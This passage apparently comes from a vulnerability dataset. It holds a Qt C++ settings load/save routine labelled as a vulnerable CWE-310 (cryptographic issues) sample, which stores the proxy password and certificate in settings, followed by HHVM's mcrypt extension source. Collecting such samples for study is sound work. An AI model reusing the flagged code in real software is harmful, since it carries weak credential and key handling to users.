SAVELOAD(qlASIOmic, "asio/mic");
SAVELOAD(qlASIOspeaker, "asio/speaker");
SAVELOAD(qsWASAPIInput, "wasapi/input");
SAVELOAD(qsWASAPIOutput, "wasapi/output");
SAVELOAD(qsALSAInput, "alsa/input");
SAVELOAD(qsALSAOutput, "alsa/output");
SAVELOAD(qsPulseAudioInput, "pulseaudio/input");
SAVELOAD(qsPulseAudioOutput, "pulseaudio/output");
SAVELOAD(qsOSSInput, "oss/input");
SAVELOAD(qsOSSOutput, "oss/output");
SAVELOAD(qsCoreAudioInput, "coreaudio/input");
SAVELOAD(qsCoreAudioOutput, "coreaudio/output");
SAVELOAD(iPortAudioInput, "portaudio/input");
SAVELOAD(iPortAudioOutput, "portaudio/output");
SAVELOAD(qbaDXInput, "directsound/input");
SAVELOAD(qbaDXOutput, "directsound/output");
SAVELOAD(bTTS, "tts/enable");
SAVELOAD(iTTSVolume, "tts/volume");
SAVELOAD(iTTSThreshold, "tts/threshold");
SAVELOAD(bTTSMessageReadBack, "tts/readback");
// Network settings
SAVELOAD(bTCPCompat, "net/tcponly");
SAVELOAD(bQoS, "net/qos");
SAVELOAD(bReconnect, "net/reconnect");
SAVELOAD(bAutoConnect, "net/autoconnect");
SAVELOAD(bSuppressIdentity, "net/suppress");
LOADENUM(ptProxyType, "net/proxytype");
SAVELOAD(qsProxyHost, "net/proxyhost");
SAVELOAD(usProxyPort, "net/proxyport");
SAVELOAD(qsProxyUsername, "net/proxyusername");
SAVELOAD(qsProxyPassword, "net/proxypassword");
SAVELOAD(iMaxImageSize, "net/maximagesize");
SAVELOAD(iMaxImageWidth, "net/maximagewidth");
SAVELOAD(iMaxImageHeight, "net/maximageheight");
SAVELOAD(qsRegionalHost, "net/region");
SAVELOAD(bExpert, "ui/expert");
SAVELOAD(qsLanguage, "ui/language");
SAVELOAD(qsStyle, "ui/style");
SAVELOAD(qsSkin, "ui/skin");
LOADENUM(ceExpand, "ui/expand");
LOADENUM(ceChannelDrag, "ui/drag");
LOADENUM(aotbAlwaysOnTop, "ui/alwaysontop");
SAVELOAD(bAskOnQuit, "ui/askonquit");
SAVELOAD(bMinimalView, "ui/minimalview");
SAVELOAD(bHideFrame, "ui/hideframe");
SAVELOAD(bUserTop, "ui/usertop");
SAVELOAD(qbaMainWindowGeometry, "ui/geometry");
SAVELOAD(qbaMainWindowState, "ui/state");
SAVELOAD(qbaMinimalViewGeometry, "ui/minimalviewgeometry");
SAVELOAD(qbaMinimalViewState, "ui/minimalviewstate");
SAVELOAD(qbaConfigGeometry, "ui/ConfigGeometry");
LOADENUM(wlWindowLayout, "ui/WindowLayout");
SAVELOAD(qbaSplitterState, "ui/splitter");
SAVELOAD(qbaHeaderState, "ui/header");
SAVELOAD(qsUsername, "ui/username");
SAVELOAD(qsLastServer, "ui/server");
LOADENUM(ssFilter, "ui/serverfilter");
#ifndef NO_UPDATE_CHECK
SAVELOAD(bPluginOverlayCheck, "ui/updatecheck");
SAVELOAD(bPluginOverlayCheck, "ui/plugincheck");
#endif
SAVELOAD(bHideInTray, "ui/hidetray");
SAVELOAD(bStateInTray, "ui/stateintray");
SAVELOAD(bUsage, "ui/usage");
SAVELOAD(bShowUserCount, "ui/showusercount");
SAVELOAD(qsImagePath, "ui/imagepath");
SAVELOAD(bShowContextMenuInMenuBar, "ui/showcontextmenuinmenubar");
SAVELOAD(qbaConnectDialogGeometry, "ui/connect/geometry");
SAVELOAD(qbaConnectDialogHeader, "ui/connect/header");
SAVELOAD(bHighContrast, "ui/HighContrast");
SAVELOAD(iMaxLogBlocks, "ui/MaxLogBlocks");
// PTT Button window
SAVELOAD(bShowPTTButtonWindow, "ui/showpttbuttonwindow");
SAVELOAD(qbaPTTButtonWindowGeometry, "ui/pttbuttonwindowgeometry");
// Recording
SAVELOAD(qsRecordingPath, "recording/path");
SAVELOAD(qsRecordingFile, "recording/file");
LOADENUM(rmRecordingMode, "recording/mode");
SAVELOAD(iRecordingFormat, "recording/format");
// LCD
SAVELOAD(iLCDUserViewMinColWidth, "lcd/userview/mincolwidth");
SAVELOAD(iLCDUserViewSplitterWidth, "lcd/userview/splitterwidth");
QByteArray qba = qvariant_cast<QByteArray> (settings_ptr->value(QLatin1String("net/certificate")));
if (! qba.isEmpty())
kpCertificate = CertWizard::importCert(qba);
int nshorts = settings_ptr->beginReadArray(QLatin1String("shortcuts"));
for (int i=0; i<nshorts; i++) {
settings_ptr->setArrayIndex(i);
Shortcut s;
s.iIndex = -2;
SAVELOAD(s.iIndex, "index");
SAVELOAD(s.qlButtons, "keys");
SAVELOAD(s.bSuppress, "suppress");
s.qvData = settings_ptr->value(QLatin1String("data"));
if (s.iIndex >= -1)
qlShortcuts << s;
}
settings_ptr->endArray();
settings_ptr->beginReadArray(QLatin1String("messages"));
for (QMap<int, quint32>::const_iterator it = qmMessages.constBegin(); it != qmMessages.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessages[it.key()], "log");
}
settings_ptr->endArray();
settings_ptr->beginReadArray(QLatin1String("messagesounds"));
for (QMap<int, QString>::const_iterator it = qmMessageSounds.constBegin(); it != qmMessageSounds.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessageSounds[it.key()], "logsound");
}
settings_ptr->endArray();
settings_ptr->beginGroup(QLatin1String("lcd/devices"));
foreach(const QString &d, settings_ptr->childKeys()) {
qmLCDDevices.insert(d, settings_ptr->value(d, true).toBool());
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("audio/plugins"));
foreach(const QString &d, settings_ptr->childKeys()) {
qmPositionalAudioPlugins.insert(d, settings_ptr->value(d, true).toBool());
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("overlay"));
os.load(settings_ptr);
settings_ptr->endGroup();
}
#undef SAVELOAD
#define SAVELOAD(var,name) if (var != def.var) settings_ptr->setValue(QLatin1String(name), var); else settings_ptr->remove(QLatin1String(name))
#define SAVEFLAG(var,name) if (var != def.var) settings_ptr->setValue(QLatin1String(name), static_cast<int>(var)); else settings_ptr->remove(QLatin1String(name))
void OverlaySettings::save() {
save(g.qs);
}
void OverlaySettings::save(QSettings* settings_ptr) {
OverlaySettings def;
SAVELOAD(bEnable, "enable");
SAVELOAD(osShow, "show");
SAVELOAD(bAlwaysSelf, "alwaysself");
SAVELOAD(uiActiveTime, "activetime");
SAVELOAD(osSort, "sort");
SAVELOAD(fX, "x");
SAVELOAD(fY, "y");
SAVELOAD(fZoom, "zoom");
SAVELOAD(uiColumns, "columns");
settings_ptr->beginReadArray(QLatin1String("states"));
for (int i=0; i<4; ++i) {
settings_ptr->setArrayIndex(i);
SAVELOAD(qcUserName[i], "color");
SAVELOAD(fUser[i], "opacity");
}
settings_ptr->endArray();
SAVELOAD(qfUserName, "userfont");
SAVELOAD(qfChannel, "channelfont");
SAVELOAD(qcChannel, "channelcolor");
SAVELOAD(qfFps, "fpsfont");
SAVELOAD(qcFps, "fpscolor");
SAVELOAD(fBoxPad, "padding");
SAVELOAD(fBoxPenWidth, "penwidth");
SAVELOAD(qcBoxPen, "pencolor");
SAVELOAD(qcBoxFill, "fillcolor");
SAVELOAD(bUserName, "usershow");
SAVELOAD(bChannel, "channelshow");
SAVELOAD(bMutedDeafened, "mutedshow");
SAVELOAD(bAvatar, "avatarshow");
SAVELOAD(bBox, "boxshow");
SAVELOAD(bFps, "fpsshow");
SAVELOAD(fUserName, "useropacity");
SAVELOAD(fChannel, "channelopacity");
SAVELOAD(fMutedDeafened, "mutedopacity");
SAVELOAD(fAvatar, "avataropacity");
SAVELOAD(fFps, "fpsopacity");
SAVELOAD(qrfUserName, "userrect");
SAVELOAD(qrfChannel, "channelrect");
SAVELOAD(qrfMutedDeafened, "mutedrect");
SAVELOAD(qrfAvatar, "avatarrect");
SAVELOAD(qrfFps, "fpsrect");
SAVEFLAG(qaUserName, "useralign");
SAVEFLAG(qaChannel, "channelalign");
SAVEFLAG(qaMutedDeafened, "mutedalign");
SAVEFLAG(qaAvatar, "avataralign");
settings_ptr->setValue(QLatin1String("usewhitelist"), bUseWhitelist);
settings_ptr->setValue(QLatin1String("blacklist"), qslBlacklist);
settings_ptr->setValue(QLatin1String("whitelist"), qslWhitelist);
}
void Settings::save() {
QSettings* settings_ptr = g.qs;
Settings def;
// Config updates
SAVELOAD(uiUpdateCounter, "lastupdate");
SAVELOAD(bMute, "audio/mute");
SAVELOAD(bDeaf, "audio/deaf");
SAVELOAD(atTransmit, "audio/transmit");
SAVELOAD(uiDoublePush, "audio/doublepush");
SAVELOAD(bTxAudioCue, "audio/pushclick");
SAVELOAD(qsTxAudioCueOn, "audio/pushclickon");
SAVELOAD(qsTxAudioCueOff, "audio/pushclickoff");
SAVELOAD(iQuality, "audio/quality");
SAVELOAD(iMinLoudness, "audio/loudness");
SAVELOAD(fVolume, "audio/volume");
SAVELOAD(fOtherVolume, "audio/othervolume");
SAVELOAD(bAttenuateOthers, "audio/attenuateothers");
SAVELOAD(bAttenuateOthersOnTalk, "audio/attenuateothersontalk");
SAVELOAD(vsVAD, "audio/vadsource");
SAVELOAD(fVADmin, "audio/vadmin");
SAVELOAD(fVADmax, "audio/vadmax");
SAVELOAD(iNoiseSuppress, "audio/noisesupress");
SAVELOAD(iVoiceHold, "audio/voicehold");
SAVELOAD(iOutputDelay, "audio/outputdelay");
SAVELOAD(iIdleTime, "audio/idletime");
SAVELOAD(fAudioMinDistance, "audio/mindistance");
SAVELOAD(fAudioMaxDistance, "audio/maxdistance");
SAVELOAD(fAudioMaxDistVolume, "audio/maxdistancevolume");
SAVELOAD(fAudioBloom, "audio/bloom");
SAVELOAD(bEcho, "audio/echo");
SAVELOAD(bEchoMulti, "audio/echomulti");
SAVELOAD(bExclusiveInput, "audio/exclusiveinput");
SAVELOAD(bExclusiveOutput, "audio/exclusiveoutput");
SAVELOAD(bPositionalAudio, "audio/positional");
SAVELOAD(bPositionalHeadphone, "audio/headphone");
SAVELOAD(qsAudioInput, "audio/input");
SAVELOAD(qsAudioOutput, "audio/output");
SAVELOAD(bWhisperFriends, "audio/whisperfriends");
SAVELOAD(bTransmitPosition, "audio/postransmit");
SAVELOAD(iJitterBufferSize, "net/jitterbuffer");
SAVELOAD(iFramesPerPacket, "net/framesperpacket");
SAVELOAD(qsASIOclass, "asio/class");
SAVELOAD(qlASIOmic, "asio/mic");
SAVELOAD(qlASIOspeaker, "asio/speaker");
SAVELOAD(qsWASAPIInput, "wasapi/input");
SAVELOAD(qsWASAPIOutput, "wasapi/output");
SAVELOAD(qsALSAInput, "alsa/input");
SAVELOAD(qsALSAOutput, "alsa/output");
SAVELOAD(qsPulseAudioInput, "pulseaudio/input");
SAVELOAD(qsPulseAudioOutput, "pulseaudio/output");
SAVELOAD(qsOSSInput, "oss/input");
SAVELOAD(qsOSSOutput, "oss/output");
SAVELOAD(qsCoreAudioInput, "coreaudio/input");
SAVELOAD(qsCoreAudioOutput, "coreaudio/output");
SAVELOAD(iPortAudioInput, "portaudio/input");
SAVELOAD(iPortAudioOutput, "portaudio/output");
SAVELOAD(qbaDXInput, "directsound/input");
SAVELOAD(qbaDXOutput, "directsound/output");
SAVELOAD(bTTS, "tts/enable");
SAVELOAD(iTTSVolume, "tts/volume");
SAVELOAD(iTTSThreshold, "tts/threshold");
SAVELOAD(bTTSMessageReadBack, "tts/readback");
// Network settings
SAVELOAD(bTCPCompat, "net/tcponly");
SAVELOAD(bQoS, "net/qos");
SAVELOAD(bReconnect, "net/reconnect");
SAVELOAD(bAutoConnect, "net/autoconnect");
SAVELOAD(ptProxyType, "net/proxytype");
SAVELOAD(qsProxyHost, "net/proxyhost");
SAVELOAD(usProxyPort, "net/proxyport");
SAVELOAD(qsProxyUsername, "net/proxyusername");
SAVELOAD(qsProxyPassword, "net/proxypassword");
SAVELOAD(iMaxImageSize, "net/maximagesize");
SAVELOAD(iMaxImageWidth, "net/maximagewidth");
SAVELOAD(iMaxImageHeight, "net/maximageheight");
SAVELOAD(qsRegionalHost, "net/region");
SAVELOAD(bExpert, "ui/expert");
SAVELOAD(qsLanguage, "ui/language");
SAVELOAD(qsStyle, "ui/style");
SAVELOAD(qsSkin, "ui/skin");
SAVELOAD(ceExpand, "ui/expand");
SAVELOAD(ceChannelDrag, "ui/drag");
SAVELOAD(aotbAlwaysOnTop, "ui/alwaysontop");
SAVELOAD(bAskOnQuit, "ui/askonquit");
SAVELOAD(bMinimalView, "ui/minimalview");
SAVELOAD(bHideFrame, "ui/hideframe");
SAVELOAD(bUserTop, "ui/usertop");
SAVELOAD(qbaMainWindowGeometry, "ui/geometry");
SAVELOAD(qbaMainWindowState, "ui/state");
SAVELOAD(qbaMinimalViewGeometry, "ui/minimalviewgeometry");
SAVELOAD(qbaMinimalViewState, "ui/minimalviewstate");
SAVELOAD(qbaConfigGeometry, "ui/ConfigGeometry");
SAVELOAD(wlWindowLayout, "ui/WindowLayout");
SAVELOAD(qbaSplitterState, "ui/splitter");
SAVELOAD(qbaHeaderState, "ui/header");
SAVELOAD(qsUsername, "ui/username");
SAVELOAD(qsLastServer, "ui/server");
SAVELOAD(ssFilter, "ui/serverfilter");
SAVELOAD(bUpdateCheck, "ui/updatecheck");
SAVELOAD(bPluginOverlayCheck, "ui/plugincheck");
SAVELOAD(bHideInTray, "ui/hidetray");
SAVELOAD(bStateInTray, "ui/stateintray");
SAVELOAD(bUsage, "ui/usage");
SAVELOAD(bShowUserCount, "ui/showusercount");
SAVELOAD(qsImagePath, "ui/imagepath");
SAVELOAD(bShowContextMenuInMenuBar, "ui/showcontextmenuinmenubar");
SAVELOAD(qbaConnectDialogGeometry, "ui/connect/geometry");
SAVELOAD(qbaConnectDialogHeader, "ui/connect/header");
SAVELOAD(bHighContrast, "ui/HighContrast");
SAVELOAD(iMaxLogBlocks, "ui/MaxLogBlocks");
// PTT Button window
SAVELOAD(bShowPTTButtonWindow, "ui/showpttbuttonwindow");
SAVELOAD(qbaPTTButtonWindowGeometry, "ui/pttbuttonwindowgeometry");
// Recording
SAVELOAD(qsRecordingPath, "recording/path");
SAVELOAD(qsRecordingFile, "recording/file");
SAVELOAD(rmRecordingMode, "recording/mode");
SAVELOAD(iRecordingFormat, "recording/format");
// LCD
SAVELOAD(iLCDUserViewMinColWidth, "lcd/userview/mincolwidth");
SAVELOAD(iLCDUserViewSplitterWidth, "lcd/userview/splitterwidth");
QByteArray qba = CertWizard::exportCert(kpCertificate);
settings_ptr->setValue(QLatin1String("net/certificate"), qba);
settings_ptr->beginWriteArray(QLatin1String("shortcuts"));
int idx = 0;
foreach(const Shortcut &s, qlShortcuts) {
if (! s.isServerSpecific()) {
settings_ptr->setArrayIndex(idx++);
settings_ptr->setValue(QLatin1String("index"), s.iIndex);
settings_ptr->setValue(QLatin1String("keys"), s.qlButtons);
settings_ptr->setValue(QLatin1String("suppress"), s.bSuppress);
settings_ptr->setValue(QLatin1String("data"), s.qvData);
}
}
settings_ptr->endArray();
settings_ptr->beginWriteArray(QLatin1String("messages"));
for (QMap<int, quint32>::const_iterator it = qmMessages.constBegin(); it != qmMessages.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessages[it.key()], "log");
}
settings_ptr->endArray();
settings_ptr->beginWriteArray(QLatin1String("messagesounds"));
for (QMap<int, QString>::const_iterator it = qmMessageSounds.constBegin(); it != qmMessageSounds.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessageSounds[it.key()], "logsound");
}
settings_ptr->endArray();
settings_ptr->beginGroup(QLatin1String("lcd/devices"));
foreach(const QString &d, qmLCDDevices.keys()) {
bool v = qmLCDDevices.value(d);
if (!v)
settings_ptr->setValue(d, v);
else
settings_ptr->remove(d);
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("audio/plugins"));
foreach(const QString &d, qmPositionalAudioPlugins.keys()) {
bool v = qmPositionalAudioPlugins.value(d);
if (!v)
settings_ptr->setValue(d, v);
else
settings_ptr->remove(d);
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("overlay"));
os.save(settings_ptr);
settings_ptr->endGroup();
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/bad_3579_1 |
crossvul-cpp_data_good_2259_0 | /*
+----------------------------------------------------------------------+
| HipHop for PHP |
+----------------------------------------------------------------------+
| Copyright (c) 2010-2014 Facebook, Inc. (http://www.facebook.com) |
| Copyright (c) 1997-2010 The PHP Group |
+----------------------------------------------------------------------+
| This source file is subject to version 3.01 of the PHP license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.php.net/license/3_01.txt |
| If you did not receive a copy of the PHP license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@php.net so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
*/
#include "hphp/runtime/base/base-includes.h"
#include "hphp/runtime/base/runtime-error.h"
#include "hphp/runtime/ext/ext_math.h"
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define NON_FREE
#define MCRYPT2
#include <mcrypt.h>
namespace HPHP {
///////////////////////////////////////////////////////////////////////////////
class MCrypt : public SweepableResourceData {
public:
explicit MCrypt(MCRYPT td) : m_td(td), m_init(false) {
}
~MCrypt() {
MCrypt::close();
}
void sweep() FOLLY_OVERRIDE {
close();
}
void close() {
if (m_td != MCRYPT_FAILED) {
mcrypt_generic_deinit(m_td);
mcrypt_module_close(m_td);
m_td = MCRYPT_FAILED;
}
}
CLASSNAME_IS("mcrypt");
// overriding ResourceData
virtual const String& o_getClassNameHook() const { return classnameof(); }
MCRYPT m_td;
bool m_init;
};
typedef enum {
RANDOM = 0,
URANDOM,
RAND
} iv_source;
class mcrypt_data {
public:
std::string algorithms_dir;
std::string modes_dir;
};
static mcrypt_data s_globals;
#define MCG(n) (s_globals.n)
#ifndef MIN
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif
#define MCRYPT_OPEN_MODULE_FAILED(str) \
raise_warning("%s(): Module initialization failed", str);
static Variant php_mcrypt_do_crypt(const String& cipher, const String& key,
const String& data, const String& mode,
const String& iv, bool dencrypt,
char *name) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)mode.data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED(name);
return false;
}
/* Checking for key-length */
int max_key_length = mcrypt_enc_get_key_size(td);
if (key.size() > max_key_length) {
raise_warning("Size of key is too large for this algorithm");
}
int count;
int *key_length_sizes = mcrypt_enc_get_supported_key_sizes(td, &count);
int use_key_length;
char *key_s = nullptr;
if (count == 0 && key_length_sizes == nullptr) { // all lengths 1 - k_l_s = OK
use_key_length = key.size();
key_s = (char*)malloc(use_key_length);
memcpy(key_s, key.data(), use_key_length);
} else if (count == 1) { /* only m_k_l = OK */
key_s = (char*)malloc(key_length_sizes[0]);
memset(key_s, 0, key_length_sizes[0]);
memcpy(key_s, key.data(), MIN(key.size(), key_length_sizes[0]));
use_key_length = key_length_sizes[0];
} else { /* dertermine smallest supported key > length of requested key */
use_key_length = max_key_length; /* start with max key length */
for (int i = 0; i < count; i++) {
if (key_length_sizes[i] >= key.size() &&
key_length_sizes[i] < use_key_length) {
use_key_length = key_length_sizes[i];
}
}
key_s = (char*)malloc(use_key_length);
memset(key_s, 0, use_key_length);
memcpy(key_s, key.data(), MIN(key.size(), use_key_length));
}
mcrypt_free(key_length_sizes);
/* Check IV */
char *iv_s = nullptr;
int iv_size = mcrypt_enc_get_iv_size(td);
/* IV is required */
if (mcrypt_enc_mode_has_iv(td) == 1) {
if (!iv.empty()) {
if (iv_size != iv.size()) {
raise_warning("%s(): The IV parameter must be as long as "
"the blocksize", name);
} else {
iv_s = (char*)malloc(iv_size + 1);
memcpy(iv_s, iv.data(), iv_size);
}
} else {
raise_warning("%s(): The IV parameter must be as long as "
"the blocksize", name);
iv_s = (char*)malloc(iv_size + 1);
memset(iv_s, 0, iv_size + 1);
}
}
int block_size;
unsigned long int data_size;
String s;
char *data_s;
/* Check blocksize */
if (mcrypt_enc_is_block_mode(td) == 1) { /* It's a block algorithm */
block_size = mcrypt_enc_get_block_size(td);
data_size = (((data.size() - 1) / block_size) + 1) * block_size;
s = String(data_size, ReserveString);
data_s = (char*)s.bufferSlice().ptr;
memset(data_s, 0, data_size);
memcpy(data_s, data.data(), data.size());
} else { /* It's not a block algorithm */
data_size = data.size();
s = String(data_size, ReserveString);
data_s = (char*)s.bufferSlice().ptr;
memcpy(data_s, data.data(), data.size());
}
if (mcrypt_generic_init(td, key_s, use_key_length, iv_s) < 0) {
raise_warning("Mcrypt initialisation failed");
return false;
}
if (dencrypt) {
mdecrypt_generic(td, data_s, data_size);
} else {
mcrypt_generic(td, data_s, data_size);
}
/* freeing vars */
mcrypt_generic_end(td);
if (key_s != nullptr) {
free(key_s);
}
if (iv_s != nullptr) {
free(iv_s);
}
s.setSize(data_size);
return s;
}
static Variant mcrypt_generic(const Resource& td, const String& data,
bool dencrypt) {
MCrypt *pm = td.getTyped<MCrypt>();
if (!pm->m_init) {
raise_warning("Operation disallowed prior to mcrypt_generic_init().");
return false;
}
if (data.empty()) {
raise_warning("An empty string was passed");
return false;
}
String s;
unsigned char* data_s;
int block_size, data_size;
/* Check blocksize */
if (mcrypt_enc_is_block_mode(pm->m_td) == 1) { /* It's a block algorithm */
block_size = mcrypt_enc_get_block_size(pm->m_td);
data_size = (((data.size() - 1) / block_size) + 1) * block_size;
s = String(data_size, ReserveString);
data_s = (unsigned char *)s.bufferSlice().ptr;
memset(data_s, 0, data_size);
memcpy(data_s, data.data(), data.size());
} else { /* It's not a block algorithm */
data_size = data.size();
s = String(data_size, ReserveString);
data_s = (unsigned char *)s.bufferSlice().ptr;
memcpy(data_s, data.data(), data.size());
}
if (dencrypt) {
mdecrypt_generic(pm->m_td, data_s, data_size);
} else {
mcrypt_generic(pm->m_td, data_s, data_size);
}
s.setSize(data_size);
return s;
}
///////////////////////////////////////////////////////////////////////////////
Variant HHVM_FUNCTION(mcrypt_module_open, const String& algorithm,
const String& algorithm_directory,
const String& mode, const String& mode_directory) {
MCRYPT td = mcrypt_module_open
((char*)algorithm.data(),
(char*)(algorithm_directory.empty() ? MCG(algorithms_dir).data() :
algorithm_directory.data()),
(char*)mode.data(),
(char*)(mode_directory.empty() ? (char*)MCG(modes_dir).data() :
mode_directory.data()));
if (td == MCRYPT_FAILED) {
raise_warning("Could not open encryption module");
return false;
}
return Resource(new MCrypt(td));
}
bool HHVM_FUNCTION(mcrypt_module_close, const Resource& td) {
td.getTyped<MCrypt>()->close();
return true;
}
Array HHVM_FUNCTION(mcrypt_list_algorithms,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
int count = 0;
char **modules = mcrypt_list_algorithms((char*)dir.data(), &count);
if (count == 0) {
raise_warning("No algorithms found in module dir");
}
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(String(modules[i], CopyString));
}
mcrypt_free_p(modules, count);
return ret;
}
Array HHVM_FUNCTION(mcrypt_list_modes,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
int count = 0;
char **modules = mcrypt_list_modes((char*)dir.data(), &count);
if (count == 0) {
raise_warning("No modes found in module dir");
}
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(String(modules[i], CopyString));
}
mcrypt_free_p(modules, count);
return ret;
}
int64_t HHVM_FUNCTION(mcrypt_module_get_algo_block_size,
const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_get_algo_block_size((char*)algorithm.data(),
(char*)dir.data());
}
int64_t HHVM_FUNCTION(mcrypt_module_get_algo_key_size, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_get_algo_key_size((char*)algorithm.data(),
(char*)dir.data());
}
Array HHVM_FUNCTION(mcrypt_module_get_supported_key_sizes,
const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
int count = 0;
int *key_sizes = mcrypt_module_get_algo_supported_key_sizes
((char*)algorithm.data(), (char*)dir.data(), &count);
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(key_sizes[i]);
}
mcrypt_free(key_sizes);
return ret;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_algorithm_mode, const String& mode,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
return mcrypt_module_is_block_algorithm_mode((char*)mode.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_algorithm, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_is_block_algorithm((char*)algorithm.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_mode, const String& mode,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
return mcrypt_module_is_block_mode((char*)mode.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_self_test, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_self_test((char*)algorithm.data(),
(char*)dir.data()) == 0;
}
Variant HHVM_FUNCTION(mcrypt_create_iv, int size, int source /* = 0 */) {
if (size <= 0 || size >= INT_MAX) {
raise_warning("Can not create an IV with a size of less than 1 or "
"greater than %d", INT_MAX);
return false;
}
int n = 0;
char *iv = (char*)calloc(size + 1, 1);
if (source == RANDOM || source == URANDOM) {
int fd = open(source == RANDOM ? "/dev/random" : "/dev/urandom", O_RDONLY);
if (fd < 0) {
free(iv);
raise_warning("Cannot open source device");
return false;
}
int read_bytes;
for (read_bytes = 0; read_bytes < size && n >= 0; read_bytes += n) {
n = read(fd, iv + read_bytes, size - read_bytes);
}
n = read_bytes;
close(fd);
if (n < size) {
free(iv);
raise_warning("Could not gather sufficient random data");
return false;
}
} else {
n = size;
while (size) {
// Use userspace rand() function because it handles auto-seeding
iv[--size] = (char)f_rand(0, 255);
}
}
return String(iv, n, AttachString);
}
Variant HHVM_FUNCTION(mcrypt_encrypt, const String& cipher, const String& key,
const String& data, const String& mode,
const Variant& viv /* = null_string */) {
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, mode, iv, false,
"mcrypt_encrypt");
}
Variant HHVM_FUNCTION(mcrypt_decrypt, const String& cipher, const String& key,
const String& data, const String& mode,
const Variant& viv /* = null_string */) {
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, mode, iv, true,
"mcrypt_decrypt");
}
Variant HHVM_FUNCTION(mcrypt_cbc, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_cbc() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "cbc", iv, mode.toInt32(),
"mcrypt_cbc");
}
Variant HHVM_FUNCTION(mcrypt_cfb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_cfb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "cfb", iv, mode.toInt32(),
"mcrypt_cfb");
}
Variant HHVM_FUNCTION(mcrypt_ecb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_ecb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "ecb", iv, mode.toInt32(),
"mcrypt_ecb");
}
Variant HHVM_FUNCTION(mcrypt_ofb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_ofb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "ofb", iv, mode.toInt32(),
"mcrypt_ofb");
}
Variant HHVM_FUNCTION(mcrypt_get_block_size, const String& cipher,
const Variant& module /* = null_string */) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)module.asCStrRef().data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_block_size");
return false;
}
int64_t ret = mcrypt_enc_get_block_size(td);
mcrypt_module_close(td);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_cipher_name, const String& cipher) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)"ecb",
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)"stream",
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_cipher_name");
return false;
}
}
char *cipher_name = mcrypt_enc_get_algorithms_name(td);
mcrypt_module_close(td);
String ret(cipher_name, CopyString);
mcrypt_free(cipher_name);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_iv_size, const String& cipher,
const String& mode) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)mode.data(),
(char*)MCG(modes_dir).data());
